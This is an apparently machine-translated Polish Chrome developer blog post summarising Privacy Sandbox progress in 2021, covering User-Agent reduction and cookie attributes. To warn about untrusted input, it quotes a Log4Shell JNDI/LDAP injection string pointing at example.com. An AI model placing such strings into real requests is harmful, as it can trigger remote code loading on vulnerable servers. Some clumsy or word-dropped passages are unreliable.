Witamy w podsumowaniu 2021 roku na kursie Postęp w zakresie prywatności w piaskownicy, śledząc kamienie milowe do wycofania plików cookie innych firm w Chrome i w sieci prywatnej. Zwykle publikujemy omówienie aktualizacji Piaskownicy prywatności oś czasu wraz z wiadomościami z całego świata w ramach projektu, ale grudzień był spokojny. Zamiast tego omówimy niektóre działań w 2021 r., i przedstawimy potencjalne rozwiązania, które można podjąć. Mamy teraz nowy rok.
Proces programowania Chromium
Aby nowa funkcja platformy internetowej trafiła do Chromium, musi przejść otwarty proces opracowywania projektu . W 2021 r. Opracowane przez zespół Piaskownicy prywatności:
| 🥚 | Zamiar tworzenia prototypu | 19 |
| 🧪 | Zamiar eksperymentowania | 7. |
| 🚀 | Zamiar wysyłki | 11 |
Każdy kamień milowy to też zaproszenie do współpracy całego ekosystemu internetu.
Zamiar utworzenia prototypu to pierwszy punkt kontrolny, w którym zapraszamy do dyskusji. i wczesnymi eksperymentami. Oznacza to, że oferta pakietowa będzie dostępna na GitHubie, gdzie możesz zadać pytanie, tworząc problem lub dołączyć do dyskusji; prezentacje w standardzie grup, takich jak W3C IETF. Tu również zaczyna się kodowanie, co oznacza, że możemy oczekiwać, prototypowej funkcji do testowania przez programistów funkcja flaga. Wstępna opinia ma kluczowe znaczenie dla weryfikacji i korygowania ofert.
Zamiar eksperymentu to opcjonalny krok, jeśli chcesz poprosić o testowania origin. Programiści mogą zarejestrować się w punkcie początkowym wersję próbną, a następnie przetestować ją w wersji produkcyjnej. Nazywa się to eksperymentem, ponieważ mamy określone aspekty tej funkcji, które mogą być zweryfikowane w rzeczywistych środowiskach. Programiści, którzy mogą testować podaj wyniki tych testów. Dostarczą one cennych opinii, które pomogą w kolejnych i i rozwijać funkcję.
Zamiar wysyłki to ostatni etap, który sygnalizuje, że funkcja jest już dostępna w całości i gotowe do ogólnej dostępności. Po zatwierdzeniu funkcja jest które potem przechodzą do następnej wersji, a później Canary, Beta i stabilnych wersji. Niezwykle ważne jest, aby przetestować swoje witryny za pomocą Wyspy Canary beta Chrome do wykrywania zgłasza wszelkie błędy, zanim funkcja stanie się stabilna.
Oferty pakietowe
Każda oferta pakietowa Piaskownicy prywatności ma powiązane repozytorium GitHub. O zawiera mechanizm wyjaśniający podsumowanie ogólnej funkcjonalności, na potrzeby implementacji przez przeglądarki, a także dane pochodzące z całych ekosystemu internetowego w postaci problemów i żądań pull.
W 14 repozytoriach Piaskownicy prywatności uzyskaliśmy:
| 💬 | 545 | Utworzono problemy |
| 250 | Problemy zostały zamknięte | |
| 🛠️ | 261 | Utworzone żądania pull |
| 223 | Żądania pull scalone |
Język wyjaśnienia i specyfikacje są często kierowane do odbiorców. znam standardy i programowanie przeglądarek, co może być może stanowić wyzwanie. Celem wyjaśnienia jest jednak to, wyjaśnić. Jeśli jakieś kwestie są niejasne lub nie zostały omówione, zwróć się zgłosić problem, żebyśmy mogli zaktualizować i doprecyzować wyjaśnienie.
Rozdzielczość
Wiosenne porządki klienta użytkownika
Gdy odliczaliśmy do Nowego Roku, odliczamy też do wszystkich dni, Chrome 100 i przyrostowa redukcja w ciągu znaków klienta użytkownika. To jest dobre aby ponownie sprawdzić użycie ciągu znaków klienta użytkownika w kodzie. na swoją usługę.
Aby je znaleźć:
- Wyszukaj hasło
navigator.userAgentw kodzie JavaScript lub otwórzUser-Agentw kodzie serwera. - Sprawdź analizowanie ciągu znaków pod kątem założeń dotyczących wersji 2-cyfrowej. Dla:
wyrażenie regularne określające
\d\dlub\d{2}należy zastąpić\d+ - Sprawdź użycie tego ciągu w miejscach, w których używasz:
- wersja platformy (systemu operacyjnego)
- pełna wersja kompilacji Chrome
- nazwa urządzenia mobilnego,
- Są to wartości, które w przyszłości zostaną ograniczone do stałych ciągów znaków. Jeśli potrzebujesz dostępu do tych wartości, przenieś do klienta User-Agent Wskazówki.
W grudniu warto wspomnieć o wdrożeniu klienta User-Agent.
Wskazówki: wysłaliśmy zamiar do wysyłki , aby umożliwić przekazywanie wskazówek innym
miejsca pochodzenia w
HTML
za pomocą tagu <meta>. Na przykład:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Jeśli masz ochotę na wiosenne porządki, możesz też alternatywę dla klienta użytkownika. Jeśli używasz tego ciągu znaków do: wykrywania urządzeń mobilnych, a następnie sprawdź, czy możesz zastąpić je reklamami elastycznymi projektu. Sprawdzasz nazwę i wersję przeglądarki pod kątem obsługi funkcji, zapoznaj się z artykułem , jeśli zamiast tego możesz używać wykrywania funkcji.
Należy zawsze pamiętać, że klient użytkownika, jak każdy klient
nie jest dokładna ani nawet podana. Niedawny wpis Log4j
luka w zabezpieczeniach, „Log4shell”
przedstawi przykład tego ryzyka. Klient, który ustawia swój ciąg znaków klienta użytkownika na
zawierają wartość taką jak ${jndi:ldap://example.com/file} może udać się uzyskać witrynę
aby aktywnie go przeanalizować na serwerze.
Katalogowanie plików cookie
Kolejną tradycyjną aktywnością noworoczną jest sprawdzanie, czy
sporą liczbę ciastek
z wysokiej jakości składników. Nadal się ruszamy
zbliża się do wycofania plików cookie innych firm,
które pliki cookie w witrynie zostaną zmienione. Rok 2020 zapewnił Ci przewagę,
stały się konieczne do oznaczania wszystkich plików cookie jako przeznaczonych dla innych witryn lub plików cookie innych firm
użyj
dzięki funkcji SameSite=None.
Każdy plik cookie, w którym atrybut SameSite ma wartość None, wymaga tagu
.
Obecnie dostępne są 3 opcje, które warto rozważyć:
- Jeśli plik cookie jest wymagany tylko w relacji 1:1 z witryną najwyższego poziomu,
a następnie śledź postęp działań CHIPS
ofertę pakietową. Wiąże się to z dodaniem parametru
Partitioned. - Jeśli plik cookie jest używany w kontekście w różnych witrynach, ale tylko w witrynach, do których
może być kandydatem do kampanii własnych źródeł
Zestawy. Wymaga to zdefiniowania parametru
i dodanie do pliku cookie atrybutu
SameParty. - Jeśli plik cookie jest używany do dostarczania jakiejś formy wspólnej wartości w wielu witryn, zbadania szerszego zestawu Piaskownicy prywatności ofert dotyczących alternatywnego rozwiązania, które nie korzystają ze śledzenia w witrynach.
Jeśli dbasz szczególnie o zdrowie, to jest idealny moment na to, ponownie sprawdzić wykorzystanie plików cookie. Mamy dobry przepis na to, własne pliki cookie.
Prześlij opinię
W miarę publikowania comiesięcznych aktualizacji i postępów w Piaskownicy prywatności, chcemy mieć pewność, że deweloperzy otrzymują potrzebne informacje i wsparcie. Daj nam znać na @ChromiumDev Twittera, jeśli jest coś, co możemy które można poprawić w tej serii. Pomoże nam to w dalszym ulepszaniu tego formatu.
zapoznaj się z najczęstszymi pytaniami na temat Piaskownicy prywatności. rozwijany zgodnie z problemami zgłaszanymi do zespołu pomocy dla deweloperów repo. Jeśli mają pytania dotyczące testowania lub wdrażania propozycji, skontaktuj się z nami.